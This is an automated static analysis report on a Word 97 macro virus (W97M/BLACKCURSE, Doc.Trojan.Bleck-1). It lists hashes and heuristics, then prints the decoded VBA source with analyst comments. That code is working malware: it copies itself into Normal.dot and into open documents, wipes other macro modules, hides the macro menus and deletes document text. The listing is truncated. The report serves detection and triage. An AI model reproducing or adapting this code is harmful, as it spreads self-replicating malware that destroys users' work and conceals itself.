Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 02776e6538c5aa68…

MALICIOUS

Office (OLE)

38.5 KB Created: 2000-12-21 05:39:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4882a0eb41f91baaf37b1fe7dda56a52 SHA-1: fa1894ed82be0d2e37b613e640d02de117eba5c2 SHA-256: 02776e6538c5aa681537e4e8c31a1b223aea9787e06130f72346ed82c75a7fed
Risk Score: 240

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Bleck-1. It contains VBA macros, including AutoOpen and AutoClose functions, which are commonly used to execute malicious code upon opening or closing the document. The VBA script appears to be designed to conceal its presence and potentially spread itself to other documents.

Heuristics 5

  • ClamAV: Doc.Trojan.Bleck-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bleck-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17997 bytes
SHA-256: b0ee136876e8c3de4faec1ea1b34de2fe45993f7edcbb94f6de2caeb0bf0f55f
Detection
ClamAV: Doc.Trojan.Bleck-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst notes: module header attributes as decoded by olevba for the
' document's ThisDocument class module. No procedure bodies follow before the
' next module header ("BLACKCURSE"), so in this listing the document-level
' module carries no code of its own; the auto-exec routines named by the
' heuristics are not within the visible part of the preview.

Attribute VB_Name = "BLACKCURSE"
Sub BLACKCURSE()
    ' W97M/BLACKCURSE
    ' BY BLACKROSE OF CAMARINES SUR
    ' BLACKROSE IS ALSO KNOWN AS ULTRAVIOLET,
    ' SKYFIRE AND BLACKVIRGOCODER
    '
    ' Analyst notes: main infection routine of the macro virus. It walks the
    ' VBA project of the Normal template and of every open document, erases the
    ' code of every module other than "BLACKCURSE" and "ThisDocument", and
    ' copies its own module into whichever side (template or document) does
    ' not yet hold it. Everything depends on programmatic access to
    ' VBProject.VBComponents, which current Office builds refuse unless "Trust
    ' access to the VBA project object model" is enabled; with the default
    ' setting the routine fails silently because of the Resume Next below.
    On Error Resume Next  ' every runtime error in this routine is swallowed
    Dim NormlTemp, ActivDoc As Boolean, Cntr As Double, WhereWeAre As Object
    Call AboutTheAuthor  ' stamps summary-info properties, see AboutTheAuthor
    ' Handles to the macro projects of Normal.dot and of the active document.
    Set BlackNormalObj = NormalTemplate.VBProject.VBComponents
    Set BlackActiveObj = ActiveDocument.VBProject.VBComponents
    ' Pass 1, Normal template: note whether the virus module is already there
    ' (NormlTemp / WhereWeAre) and wipe the code of every other user module.
    For Cntr = 1 To BlackNormalObj.Count
        MName = BlackNormalObj.Item(Cntr).Name
            If MName = "BLACKCURSE" Then
                NormlTemp = True
                Set WhereWeAre = BlackNormalObj.Item("BLACKCURSE").Codemodule
            End If
            If (MName <> "BLACKCURSE") And (MName <> "ThisDocument") Then
                ' Destructive: deletes all lines of any other module in Normal.dot.
                BlackNormalObj.Item(Cntr).Codemodule.Deletelines 1, BlackNormalObj.Item(Cntr).Codemodule.CountOfLines
            End If
    Next Cntr
    ' Pass 2, every open document: same check-and-wipe.
    For Each Baby In Documents
        ActivDoc = False
        Set BlackActiveObj = Baby.VBProject.VBComponents
        For Cntr = 1 To BlackActiveObj.Count
            MName = BlackActiveObj.Item(Cntr).Name
                If MName = "BLACKCURSE" Then
                    ActivDoc = True
                    Set WhereWeAre = BlackActiveObj.Item("BLACKCURSE").Codemodule
                End If
                If (MName <> "BLACKCURSE") And (MName <> "ThisDocument") Then
                    ' NOTE(analysis): the line count is taken from BlackNormalObj,
                    ' not BlackActiveObj, so the wipe here uses the template
                    ' module's length; any resulting error is hidden by Resume Next.
                    BlackActiveObj.Item(Cntr).Codemodule.Deletelines 1, BlackNormalObj.Item(Cntr).Codemodule.CountOfLines
                End If
        Next Cntr
        ' Template infected but this document not: copy the module into the
        ' document and re-save it in format 0 (Word document), unless its name
        ' contains "Document" — presumably to skip unsaved "DocumentN" windows.
        If NormlTemp And Not ActivDoc Then
            Spread BD:=BlackActiveObj.Add(1), BS:=WhereWeAre
               If InStr(1, ActiveDocument.Name, "Document", 1) = 0 Then
                   ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=0
               End If
        End If
    Next Baby
    ' Template not yet infected: hide the macro UI (Stealth), copy the module
    ' into Normal.dot and persist it. A modified Normal.dot carrying a module
    ' named "BLACKCURSE" is the primary artifact to look for on affected hosts.
    If Not NormlTemp Then
            Stealth
            Spread BD:=BlackNormalObj.Add(1), BS:=WhereWeAre
            NormalTemplate.Save
    End If
End Sub
Function Spread(BD As Object, BS As Object)
    ' Analyst notes: replicates the virus module source, line by line, from the
    ' code module BS into the freshly added component BD, which is renamed
    ' "BLACKCURSE". The loop stops at the first empty source line, so only the
    ' leading contiguous block of the module is copied. The caller (BLACKCURSE)
    ' passes Add(1) — a new standard module — as BD and the located BLACKCURSE
    ' CodeModule as BS. No explicit return value is assigned.
    On Error Resume Next
        Cntr = 1
        BD.Name = "BLACKCURSE"
        Do While BS.Lines(Cntr, 1) <> ""
            BD.Codemodule.Insertlines Cntr, BS.Lines(Cntr, 1)
            Cntr = Cntr + 1
        Loop
End Function
Sub Stealth()
    ' Analyst notes: anti-forensic UI tampering, stored in the Normal template
    ' (CustomizationContext below). It greys out Tools > Macro and
    ' Tools > Options, disables and locks the "Visual Basic" command bar, and
    ' unbinds two Alt-modified function keys (key codes 122 and 119 with
    ' modifier 1024, which by the wdKey* constants correspond to Alt+F11 and
    ' Alt+F8 — the VBE and Macros-dialog shortcuts). For triage: a Word install
    ' where Tools > Macro is disabled and the Visual Basic toolbar is hidden is
    ' a visible indicator of this family, and because the changes live in
    ' Normal.dot they survive until that template is replaced.
    On Error Resume Next
        CustomizationContext = NormalTemplate  ' persist the changes below in Normal.dot
        CommandBars("Tools").Controls("Macro").Enabled = False
        CommandBars("Tools").Controls("Options").Enabled = False
        CommandBars("Visual Basic").Enabled = False
        CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
        CommandBars("Visual Basic").Protection = msoBarNoCustomize
        FindKey(BuildKeyCode(122, 1024)).Disable
        FindKey(BuildKeyCode(119, 1024)).Disable
        CommandBars("Visual Basic").Visible = False
End Sub
Sub AboutTheAuthor()
    ' Analyst notes: opens Word built-in dialog 86 (presumably the File >
    ' Properties / Summary Info dialog), sets its Title and Author fields to
    ' the strings below and executes it, so infected documents carry these
    ' values in their summary metadata — a cheap hunting indicator for this
    ' family (document properties Title="BLACKCURSE", Author="BLACKROSE").
    On Error Resume Next
        With Dialogs(86)
          .Title = "BLACKCURSE"
          .Author = "BLACKROSE"
          .Execute
        End With
End Sub
Sub ActivateBLACKCURSE()
    On Error Resume Next
        Mensahe = """HIJADIPUTA KANG HAYUP KA!" & vbCrLf & _
                  "BURAY MO, SAKA BURAY NI INA MO! HAYUP KA!" & vbCrLf & _
                  "SAYANG KA, HAYUP KA!" & vbCrLf & _
                  "HAYUP KA TALAGA!"""
        If Documents.Count = 0 Then
            Documents.Add
        Else
            Selection.WholeStory
            Selection.Delete Unit:=1, Count:=1
        End If
        If ActiveWindow.View.SplitSpecial = wdPaneNone Then
            ActiveWindow.ActivePane.View.Type = wdPageView
        Else
            ActiveWindow.View.Type = wdPageView
        End If
        Application.Caption = "Birthday ko " & Date
        W
... (truncated)